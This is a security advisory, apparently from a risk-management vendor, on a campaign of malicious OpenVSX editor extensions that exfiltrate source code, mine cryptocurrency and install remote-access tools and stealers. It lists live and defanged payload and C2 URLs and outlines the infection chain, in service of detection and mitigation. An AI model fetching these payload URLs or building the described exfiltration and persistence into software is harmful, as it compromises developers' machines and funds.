Executive Summary

A new wave of malicious activity has been detected targeting the developer ecosystem through the distribution of crypto-stealing and data-exfiltrating extensions on the OpenVSX registry, a popular open-source alternative to the official Visual Studio Code (VSCode) Marketplace. These extensions, often masquerading as legitimate tools for languages such as Solidity and C++, are engineered to steal cryptocurrency, exfiltrate sensitive source code, and establish persistent remote access to developer environments. Despite takedowns from the official VSCode Marketplace, these threats persist on OpenVSX, which is widely used by next-generation AI-powered editors like Cursor and Windsurf. The campaign has resulted in at least one confirmed theft of $500,000 in crypto assets and demonstrates advanced evasion, persistence, and social engineering techniques. This advisory provides a comprehensive technical analysis, threat actor profiling, exploitation details, and actionable mitigation strategies for organizations and developers.

Threat Actor Profile

The primary threat actor behind this campaign is tracked as TigerJack, a group or individual demonstrating a high degree of operational security, technical sophistication, and persistence. TigerJack employs multi-account operations, impersonates legitimate developers, and leverages credible branding and GitHub repositories to increase the trustworthiness of their malicious extensions. The actor rapidly re-uploads new malicious packages after takedowns, often using typosquatting techniques such as visually similar developer names (e.g., "juanbIanco" with a capital "I" instead of "juanblanco"). The campaign is not currently attributed to a known Advanced Persistent Threat (APT) group but shares characteristics with the earlier WhiteCobra campaign, which also targeted the VSCode ecosystem with crypto-stealing extensions.

Technical Analysis of Malware/TTPs

The malicious extensions identified on OpenVSX include, but are not limited to, C++ Playground, HTTP Format, pythonformat, Solidity Language, and a malicious variant of solidity. These extensions are distributed under the guise of providing legitimate development features such as syntax highlighting or code formatting. However, upon installation and activation, they execute a multi-stage attack chain:

The initial infection occurs when a user installs a malicious extension from OpenVSX. The extension may appear recently updated and have inflated download counts, achieved through bot activity to boost its ranking in search results. Once activated, the extension downloads and executes a remote JavaScript or PowerShell payload from hardcoded endpoints such as ab498.pythonanywhere.com/static/in4.js or https://angelic[.]su/files/1.txt. This payload is polled at regular intervals (e.g., every 20 minutes), enabling dynamic delivery of new malicious code without requiring extension updates.

The payloads perform several malicious actions. In the case of C++ Playground, the extension registers an onDidChangeTextDocument listener, capturing and exfiltrating source code in near real-time (within 500 milliseconds of edits) to external servers. This enables intellectual property theft, reconnaissance, and potential supply chain compromise. HTTP Format and similar extensions operate as advertised but surreptitiously run a CoinIMP cryptocurrency miner in the background, hijacking host CPU and GPU resources for illicit mining operations. There are no resource usage restrictions, which can lead to significant performance degradation and increased operational costs.

More advanced extensions, such as the malicious Solidity Language and solidity variants, target blockchain and cryptocurrency developers. These extensions download and execute PowerShell scripts that check for the presence of remote access tools like ScreenConnect. If absent, the script downloads and installs ScreenConnect from https://lmfao[.]su/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest, establishing persistent remote access via a command and control (C2) server at relay.lmfao[.]su (IP: 144.172.112[.]84). The attackers then use ScreenConnect to upload and execute additional VBScripts, which in turn download further PowerShell payloads from services like paste.ee. These scripts extract and run the VMDetector loader from an image hosted on archive[.]org, which finally downloads and executes the Quasar backdoor and a stealer identified as HEUR:Trojan-PSW.MSIL.PureLogs.gen. This stealer is capable of harvesting browser credentials, email data, and, critically, cryptocurrency wallet passphrases.

The attack chain is designed for persistence and reinfection. After takedown, the threat actor re-uploads new malicious extensions with similar names and functionality, using typosquatting and download inflation to regain visibility. The extensions are often indistinguishable from legitimate ones in search results, increasing the risk of inadvertent installation.

Exploitation in the Wild

The exploitation of these malicious extensions has been observed in the wild, with victims primarily among developers using Cursor, Windsurf, and other editors that rely on OpenVSX. The campaign is global in scope, with no specific country targeting, but has a particular focus on blockchain and cryptocurrency development sectors. The most notable confirmed incident involved a blockchain developer who lost approximately $500,000 in crypto assets after installing a malicious Solidity Language extension. Attackers gained persistent remote access, exfiltrated sensitive data, and deployed additional malware, including credential stealers and backdoors.

Distribution tactics include promoting malicious extensions in OpenVSX search results using recent update dates and artificially inflated download counts. Legitimate and malicious extensions often appear side-by-side, with nearly identical names and developer identities, making it challenging for users to distinguish between them. The rapid re-uploading of new malicious packages after takedowns further complicates mitigation efforts.

Victimology and Targeting

The primary victims of this campaign are developers and organizations in the blockchain, cryptocurrency, and software development sectors. The attack surface is expanded by the use of AI-powered code editors such as Cursor and Windsurf, which default to the OpenVSX registry for extension management. The campaign does not appear to target specific countries but rather exploits the global nature of the developer community. The use of typosquatting and social engineering in extension descriptions increases the likelihood of successful compromise, particularly among less security-aware users.

The impact of these attacks is significant, ranging from direct financial loss through cryptocurrency theft to intellectual property exfiltration and the establishment of persistent backdoors within corporate networks. The ability of the malware to inject backdoors into projects and monitor real-time activity further elevates the risk of supply chain compromise.

Mitigation and Countermeasures

Organizations and individual developers are strongly advised to take immediate and long-term actions to mitigate the risk posed by malicious OpenVSX extensions. Immediate steps include auditing all installed extensions for the indicators of compromise (IOCs) listed in this report, removing any suspicious or unverified extensions—especially those named C++ Playground, HTTP Format, pythonformat, Solidity Language, and the malicious solidity variant—and monitoring for connections to known C2 domains such as ab498.pythonanywhere.com, angelic[.]su, and relay.lmfao[.]su. System resource usage should be reviewed for unexplained spikes, which may indicate unauthorized crypto mining activity. Additionally, check for unauthorized installation of remote access tools like ScreenConnect.

Long-term recommendations include installing extensions only from verified and reputable publishers, closely monitoring extension updates and permissions, and implementing endpoint monitoring solutions capable of detecting suspicious extension behavior and PowerShell execution. Organizations should educate developers on the risks of typosquatting and social engineering in extension marketplaces and encourage the reporting of suspicious extensions to OpenVSX and VSCode maintainers. The deployment of Extended Detection and Response (XDR) solutions is recommended to monitor for suspicious activity within the corporate network and to provide rapid incident response capabilities.

References

BleepingComputer: Malicious crypto-stealing VSCode extensions resurface on OpenVSX,Kaspersky: How extensions from Open VSX were used to steal cryptocurrency,Securelist: Code highlighting with Cursor AI for $500,000,TechRadar: VSCode market struck by huge influx of malicious WhiteCobra extensions,MITRE ATT&CK Framework,OpenVSX Registry

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats in real time. For more information or to discuss how Rescana can help secure your organization, we are happy to answer questions at ops@rescana.com.